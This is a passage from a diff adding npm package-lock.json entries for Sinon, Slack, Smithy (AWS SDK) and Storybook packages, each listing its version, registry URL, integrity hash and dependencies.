"sha512-RNiOoTPkptFtSVzQevY/yWtZwf/RxyVnPy/OcA9HBM3MlGDnBEYL5B41H0MTn0Uec8Hi+2qUtTfG2WWZBmMejQ==" + }, + "node_modules/@sinclair/typebox": { + "version": "0.27.8", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", + "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", + "dev": true + }, + "node_modules/@sindresorhus/fnv1a": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@sindresorhus/fnv1a/-/fnv1a-2.0.1.tgz", + "integrity": "sha512-suq9tRQ6bkpMukTG5K5z0sPWB7t0zExMzZCdmYm6xTSSIm/yCKNm7VCL36wVeyTsFr597/UhU1OAYdHGMDiHrw==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/@sindresorhus/merge-streams": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/@sindresorhus/merge-streams/-/merge-streams-2.3.0.tgz", + "integrity": "sha512-LtoMMhxAlorcGhmFYI+LhPgbPZCkgP6ra1YL604EeF6U98pLlQ3iWIGMdWSC+vWmPBWBNgmDBAhnAobLROJmwg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@sinonjs/commons": { + "version": "1.8.3", + "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.3.tgz", + "integrity": "sha512-xkNcLAn/wZaX14RPlwizcKicDk9G3F8m2nU3L7Ukm5zBgTwiT0wsoFAHx9Jq56fJA1z/7uKGtCRu16sOUCLIHQ==", + "dev": true, + "dependencies": { + "type-detect": "4.0.8" + } + }, + "node_modules/@sinonjs/fake-timers": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-6.0.1.tgz", + "integrity": "sha512-MZPUxrmFubI36XS1DI3qmI0YdN1gks62JtFZvxR67ljjSNCeK6U08Zx4msEWOXuofgqUt6zPHSi1H9fbjR/NRA==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0" + } + }, + "node_modules/@sinonjs/formatio": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/@sinonjs/formatio/-/formatio-5.0.1.tgz", + "integrity": "sha512-KaiQ5pBf1MpS09MuA0kp6KBQt2JUOQycqVG1NZXvzeaXe5LGFqAKueIS0bw4w0P9r7KuBSVdUk5QjXsUdu2CxQ==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1", + "@sinonjs/samsam": "^5.0.2" + } + }, + "node_modules/@sinonjs/samsam": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/@sinonjs/samsam/-/samsam-5.3.1.tgz", + "integrity": 
"sha512-1Hc0b1TtyfBu8ixF/tpfSHTVWKwCBLY4QJbkgnE7HcwyvT2xArDxb4K7dMgqRm3szI+LJbzmW/s4xxEhv6hwDg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.6.0", + "lodash.get": "^4.4.2", + "type-detect": "^4.0.8" + } + }, + "node_modules/@sinonjs/text-encoding": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/@sinonjs/text-encoding/-/text-encoding-0.7.1.tgz", + "integrity": "sha512-+iTbntw2IZPb/anVDbypzfQa+ay64MW0Zo8aJ8gZPWMMK6/OubMVb6lUPMagqjOPnmtauXnFCACVl3O7ogjeqQ==", + "dev": true + }, + "node_modules/@slack/types": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/@slack/types/-/types-2.10.0.tgz", + "integrity": "sha512-JXY9l49rf7dDgvfMZi0maFyugzGkvq0s5u+kDlD68WaRUhjZNLBDKZcsrycMsVVDFfyOK0R1UKkYGmy9Ph069Q==", + "engines": { + "node": ">= 12.13.0", + "npm": ">= 6.12.0" + } + }, + "node_modules/@slack/webhook": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/@slack/webhook/-/webhook-7.0.2.tgz", + "integrity": "sha512-dsrO/ow6a6+xkLm/lZKbUNTsFJlBc679tD+qwlVTztsQkDxPLH6odM7FKALz1IHa+KpLX8HKUIPV13a7y7z29w==", + "dependencies": { + "@slack/types": "^2.9.0", + "@types/node": ">=18.0.0", + "axios": "^1.6.3" + }, + "engines": { + "node": ">= 18", + "npm": ">= 8.6.0" + } + }, + "node_modules/@smithy/abort-controller": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/abort-controller/-/abort-controller-1.0.2.tgz", + "integrity": "sha512-tb2h0b+JvMee+eAxTmhnyqyNk51UXIK949HnE14lFeezKsVJTB30maan+CO2IMwnig2wVYQH84B5qk6ylmKCuA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/config-resolver": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/config-resolver/-/config-resolver-1.0.2.tgz", + "integrity": "sha512-8Bk7CgnVKg1dn5TgnjwPz2ebhxeR7CjGs5yhVYH3S8x0q8yPZZVWwpRIglwXaf5AZBzJlNO1lh+lUhMf2e73zQ==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "@smithy/util-config-provider": "^1.0.2", + "@smithy/util-middleware": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/credential-provider-imds": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-1.0.2.tgz", + "integrity": "sha512-fLjCya+JOu2gPJpCiwSUyoLvT8JdNJmOaTOkKYBZoGf7CzqR6lluSyI+eboZnl/V0xqcfcqBG4tgqCISmWS3/w==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/node-config-provider": "^1.0.2", + "@smithy/property-provider": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/url-parser": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/eventstream-codec": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/eventstream-codec/-/eventstream-codec-1.0.2.tgz", + "integrity": "sha512-eW/XPiLauR1VAgHKxhVvgvHzLROUgTtqat2lgljztbH8uIYWugv7Nz+SgCavB+hWRazv2iYgqrSy74GvxXq/rg==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/crc32": "3.0.0", + "@smithy/types": "^1.1.1", + "@smithy/util-hex-encoding": "^1.0.2", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/fetch-http-handler": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-1.0.2.tgz", + "integrity": "sha512-kynyofLf62LvR8yYphPPdyHb8fWG3LepFinM/vWUTG2Q1pVpmPCM530ppagp3+q2p+7Ox0UvSqldbKqV/d1BpA==", + "optional": true, + 
"peer": true, + "dependencies": { + "@smithy/protocol-http": "^1.1.1", + "@smithy/querystring-builder": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/util-base64": "^1.0.2", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/hash-node": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/hash-node/-/hash-node-1.0.2.tgz", + "integrity": "sha512-K6PKhcUNrJXtcesyzhIvNlU7drfIU7u+EMQuGmPw6RQDAg/ufUcfKHz4EcUhFAodUmN+rrejhRG9U6wxjeBOQA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "@smithy/util-buffer-from": "^1.0.2", + "@smithy/util-utf8": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/invalid-dependency": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/invalid-dependency/-/invalid-dependency-1.0.2.tgz", + "integrity": "sha512-B1Y3Tsa6dfC+Vvb+BJMhTHOfFieeYzY9jWQSTR1vMwKkxsymD0OIAnEw8rD/RiDj/4E4RPGFdx9Mdgnyd6Bv5Q==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/is-array-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/is-array-buffer/-/is-array-buffer-1.0.2.tgz", + "integrity": "sha512-pkyBnsBRpe+c/6ASavqIMRBdRtZNJEVJOEzhpxZ9JoAXiZYbkfaSMRA/O1dUxGdJ653GHONunnZ4xMo/LJ7utQ==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-content-length": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/middleware-content-length/-/middleware-content-length-1.0.2.tgz", + "integrity": "sha512-pa1/SgGIrSmnEr2c9Apw7CdU4l/HW0fK3+LKFCPDYJrzM0JdYpqjQzgxi31P00eAkL0EFBccpus/p1n2GF9urw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/protocol-http": "^1.1.1", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-endpoint": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@smithy/middleware-endpoint/-/middleware-endpoint-1.0.3.tgz", + "integrity": "sha512-GsWvTXMFjSgl617PCE2km//kIjjtvMRrR2GAuRDIS9sHiLwmkS46VWaVYy+XE7ubEsEtzZ5yK2e8TKDR6Qr5Lw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/middleware-serde": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/url-parser": "^1.0.2", + "@smithy/util-middleware": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-retry": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@smithy/middleware-retry/-/middleware-retry-1.0.4.tgz", + "integrity": "sha512-G7uRXGFL8c3F7APnoIMTtNAHH8vT4F2qVnAWGAZaervjupaUQuRRHYBLYubK0dWzOZz86BtAXKieJ5p+Ni2Xpg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/protocol-http": "^1.1.1", + "@smithy/service-error-classification": "^1.0.3", + "@smithy/types": "^1.1.1", + "@smithy/util-middleware": "^1.0.2", + "@smithy/util-retry": "^1.0.4", + "tslib": "^2.5.0", + "uuid": "^8.3.2" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-retry/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "optional": true, + "peer": true, + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@smithy/middleware-serde": 
{ + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/middleware-serde/-/middleware-serde-1.0.2.tgz", + "integrity": "sha512-T4PcdMZF4xme6koUNfjmSZ1MLi7eoFeYCtodQNQpBNsS77TuJt1A6kt5kP/qxrTvfZHyFlj0AubACoaUqgzPeg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/middleware-stack": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/middleware-stack/-/middleware-stack-1.0.2.tgz", + "integrity": "sha512-H7/uAQEcmO+eDqweEFMJ5YrIpsBwmrXSP6HIIbtxKJSQpAcMGY7KrR2FZgZBi1FMnSUOh+rQrbOyj5HQmSeUBA==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/node-config-provider": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/node-config-provider/-/node-config-provider-1.0.2.tgz", + "integrity": "sha512-HU7afWpTToU0wL6KseGDR2zojeyjECQfr8LpjAIeHCYIW7r360ABFf4EaplaJRMVoC3hD9FeltgI3/NtShOqCg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/property-provider": "^1.0.2", + "@smithy/shared-ini-file-loader": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/node-http-handler": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-1.0.3.tgz", + "integrity": "sha512-PcPUSzTbIb60VCJCiH0PU0E6bwIekttsIEf5Aoo/M0oTfiqsxHTn0Rcij6QoH6qJy6piGKXzLSegspXg5+Kq6g==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/abort-controller": "^1.0.2", + "@smithy/protocol-http": "^1.1.1", + "@smithy/querystring-builder": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/property-provider": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/property-provider/-/property-provider-1.0.2.tgz", + "integrity": "sha512-pXDPyzKX8opzt38B205kDgaxda6LHcTfPvTYQZnwP6BAPp1o9puiCPjeUtkKck7Z6IbpXCPUmUQnzkUzWTA42Q==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/protocol-http": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@smithy/protocol-http/-/protocol-http-1.1.1.tgz", + "integrity": "sha512-mFLFa2sSvlUxm55U7B4YCIsJJIMkA6lHxwwqOaBkral1qxFz97rGffP/mmd4JDuin1EnygiO5eNJGgudiUgmDQ==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/querystring-builder": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/querystring-builder/-/querystring-builder-1.0.2.tgz", + "integrity": "sha512-6P/xANWrtJhMzTPUR87AbXwSBuz1SDHIfL44TFd/GT3hj6rA+IEv7rftEpPjayUiWRocaNnrCPLvmP31mobOyA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "@smithy/util-uri-escape": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/querystring-parser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/querystring-parser/-/querystring-parser-1.0.2.tgz", + "integrity": "sha512-IWxwxjn+KHWRRRB+K2Ngl+plTwo2WSgc2w+DvLy0DQZJh9UGOpw40d6q97/63GBlXIt4TEt5NbcFrO30CKlrsA==", + "optional": true, + "peer": true, + 
"dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/service-error-classification": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@smithy/service-error-classification/-/service-error-classification-1.0.3.tgz", + "integrity": "sha512-2eglIYqrtcUnuI71yweu7rSfCgt6kVvRVf0C72VUqrd0LrV1M0BM0eYN+nitp2CHPSdmMI96pi+dU9U/UqAMSA==", + "optional": true, + "peer": true, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/shared-ini-file-loader": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/shared-ini-file-loader/-/shared-ini-file-loader-1.0.2.tgz", + "integrity": "sha512-bdQj95VN+lCXki+P3EsDyrkpeLn8xDYiOISBGnUG/AGPYJXN8dmp4EhRRR7XOoLoSs8anZHR4UcGEOzFv2jwGw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/signature-v4": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-1.0.2.tgz", + "integrity": "sha512-rpKUhmCuPmpV5dloUkOb9w1oBnJatvKQEjIHGmkjRGZnC3437MTdzWej9TxkagcZ8NRRJavYnEUixzxM1amFig==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/eventstream-codec": "^1.0.2", + "@smithy/is-array-buffer": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/util-hex-encoding": "^1.0.2", + "@smithy/util-middleware": "^1.0.2", + "@smithy/util-uri-escape": "^1.0.2", + "@smithy/util-utf8": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/smithy-client": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@smithy/smithy-client/-/smithy-client-1.0.4.tgz", + "integrity": "sha512-gpo0Xl5Nyp9sgymEfpt7oa9P2q/GlM3VmQIdm+FeH0QEdYOQx3OtvwVmBYAMv2FIPWxkMZlsPYRTnEiBTK5TYg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/middleware-stack": "^1.0.2", + "@smithy/types": "^1.1.1", + "@smithy/util-stream": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/types": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@smithy/types/-/types-1.1.1.tgz", + "integrity": "sha512-tMpkreknl2gRrniHeBtdgQwaOlo39df8RxSrwsHVNIGXULy5XP6KqgScUw2m12D15wnJCKWxVhCX+wbrBW/y7g==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/url-parser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/url-parser/-/url-parser-1.0.2.tgz", + "integrity": "sha512-0JRsDMQe53F6EHRWksdcavKDRjyqp8vrjakg8EcCUOa7PaFRRB1SO/xGZdzSlW1RSTWQDEksFMTCEcVEKmAoqA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/querystring-parser": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/util-base64": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-base64/-/util-base64-1.0.2.tgz", + "integrity": "sha512-BCm15WILJ3SL93nusoxvJGMVfAMWHZhdeDZPtpAaskozuexd0eF6szdz4kbXaKp38bFCSenA6bkUHqaE3KK0dA==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/util-buffer-from": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-body-length-browser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-body-length-browser/-/util-body-length-browser-1.0.2.tgz", + "integrity": 
"sha512-Xh8L06H2anF5BHjSYTg8hx+Itcbf4SQZnVMl4PIkCOsKtneMJoGjPRLy17lEzfoh/GOaa0QxgCP6lRMQWzNl4w==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + } + }, + "node_modules/@smithy/util-body-length-node": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-body-length-node/-/util-body-length-node-1.0.2.tgz", + "integrity": "sha512-nXHbZsUtvZeyfL4Ceds9nmy2Uh2AhWXohG4vWHyjSdmT8cXZlJdmJgnH6SJKDjyUecbu+BpKeVvSrA4cWPSOPA==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-buffer-from": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-buffer-from/-/util-buffer-from-1.0.2.tgz", + "integrity": "sha512-lHAYIyrBO9RANrPvccnPjU03MJnWZ66wWuC5GjWWQVfsmPwU6m00aakZkzHdUT6tGCkGacXSgArP5wgTgA+oCw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/is-array-buffer": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-config-provider": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-config-provider/-/util-config-provider-1.0.2.tgz", + "integrity": "sha512-HOdmDm+3HUbuYPBABLLHtn8ittuRyy+BSjKOA169H+EMc+IozipvXDydf+gKBRAxUa4dtKQkLraypwppzi+PRw==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-defaults-mode-browser": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-browser/-/util-defaults-mode-browser-1.0.2.tgz", + "integrity": "sha512-J1u2PO235zxY7dg0+ZqaG96tFg4ehJZ7isGK1pCBEA072qxNPwIpDzUVGnLJkHZvjWEGA8rxIauDtXfB0qxeAg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/property-provider": "^1.0.2", + "@smithy/types": "^1.1.1", + "bowser": "^2.11.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/@smithy/util-defaults-mode-node": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-node/-/util-defaults-mode-node-1.0.2.tgz", + "integrity": "sha512-9/BN63rlIsFStvI+AvljMh873Xw6bbI6b19b+PVYXyycQ2DDQImWcjnzRlHW7eP65CCUNGQ6otDLNdBQCgMXqg==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/config-resolver": "^1.0.2", + "@smithy/credential-provider-imds": "^1.0.2", + "@smithy/node-config-provider": "^1.0.2", + "@smithy/property-provider": "^1.0.2", + "@smithy/types": "^1.1.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/@smithy/util-hex-encoding": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-hex-encoding/-/util-hex-encoding-1.0.2.tgz", + "integrity": "sha512-Bxydb5rMJorMV6AuDDMOxro3BMDdIwtbQKHpwvQFASkmr52BnpDsWlxgpJi8Iq7nk1Bt4E40oE1Isy/7ubHGzg==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-middleware": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-middleware/-/util-middleware-1.0.2.tgz", + "integrity": "sha512-vtXK7GOR2BoseCX8NCGe9SaiZrm9M2lm/RVexFGyPuafTtry9Vyv7hq/vw8ifd/G/pSJ+msByfJVb1642oQHKw==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-retry": { + "version": "1.0.4", + "resolved": 
"https://registry.npmjs.org/@smithy/util-retry/-/util-retry-1.0.4.tgz", + "integrity": "sha512-RnZPVFvRoqdj2EbroDo3OsnnQU8eQ4AlnZTOGusbYKybH3269CFdrZfZJloe60AQjX7di3J6t/79PjwCLO5Khw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/service-error-classification": "^1.0.3", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">= 14.0.0" + } + }, + "node_modules/@smithy/util-stream": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-stream/-/util-stream-1.0.2.tgz", + "integrity": "sha512-qyN2M9QFMTz4UCHi6GnBfLOGYKxQZD01Ga6nzaXFFC51HP/QmArU72e4kY50Z/EtW8binPxspP2TAsGbwy9l3A==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/fetch-http-handler": "^1.0.2", + "@smithy/node-http-handler": "^1.0.3", + "@smithy/types": "^1.1.1", + "@smithy/util-base64": "^1.0.2", + "@smithy/util-buffer-from": "^1.0.2", + "@smithy/util-hex-encoding": "^1.0.2", + "@smithy/util-utf8": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-uri-escape": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-uri-escape/-/util-uri-escape-1.0.2.tgz", + "integrity": "sha512-k8C0BFNS9HpBMHSgUDnWb1JlCQcFG+PPlVBq9keP4Nfwv6a9Q0yAfASWqUCtzjuMj1hXeLhn/5ADP6JxnID1Pg==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@smithy/util-utf8": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@smithy/util-utf8/-/util-utf8-1.0.2.tgz", + "integrity": "sha512-V4cyjKfJlARui0dMBfWJMQAmJzoW77i4N3EjkH/bwnE2Ngbl4tqD2Y0C/xzpzY/J1BdxeCKxAebVFk8aFCaSCw==", + "optional": true, + "peer": true, + "dependencies": { + "@smithy/util-buffer-from": "^1.0.2", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@storybook/addon-a11y": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-a11y/-/addon-a11y-8.6.4.tgz", + "integrity": "sha512-B3/d2cRlnpAlE3kh+OBaly6qrWN9DEqwDyZsNeobaiXnNp11xoHZP2OWjEwXldc0pKls41jeOksXyXrILfvTng==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/addon-highlight": "8.6.4", + "@storybook/test": "8.6.4", + "axe-core": "^4.2.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-actions": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-actions/-/addon-actions-8.6.4.tgz", + "integrity": "sha512-mCcyfkeb19fJX0dpQqqZCnWBwjVn0/27xcpR0mbm/KW2wTByU6bKFFujgrHsX3ONl97IcIaUnmwwUwBr1ebZXw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@types/uuid": "^9.0.1", + "dequal": "^2.0.2", + "polished": "^4.2.2", + "uuid": "^9.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-actions/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "dev": true, + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@storybook/addon-backgrounds": { + "version": "8.6.4", + 
"resolved": "https://registry.npmjs.org/@storybook/addon-backgrounds/-/addon-backgrounds-8.6.4.tgz", + "integrity": "sha512-lRYGumlYdd1RptQJvOTRMx/q2pDmg2MO5GX4la7VfI8KrUyeuC1ZOSRDEcXeTuAZWJztqmtymg6bB7cAAoxCFA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "memoizerific": "^1.11.3", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-controls": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-controls/-/addon-controls-8.6.4.tgz", + "integrity": "sha512-oMMP9Bj0RMfYmaitjFt6oBSjKH4titUqP+wE6PrZ3v+Om56f4buqfNKXRf80As2OrsZn0pjj95muWzVVHqIhyQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "dequal": "^2.0.2", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-docs": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-docs/-/addon-docs-8.6.4.tgz", + "integrity": "sha512-+kbcjvEAH0Xs+k+raAwfC0WmJilWhxBYnLLeazP3m5AkVI3sIjbzuuZ78NR0DCdRkw9BpuuXMHv5o4tIvLIUlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@mdx-js/react": "^3.0.0", + "@storybook/blocks": "8.6.4", + "@storybook/csf-plugin": "8.6.4", + "@storybook/react-dom-shim": "8.6.4", + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-essentials": { + "version": "8.6.4", + "resolved": 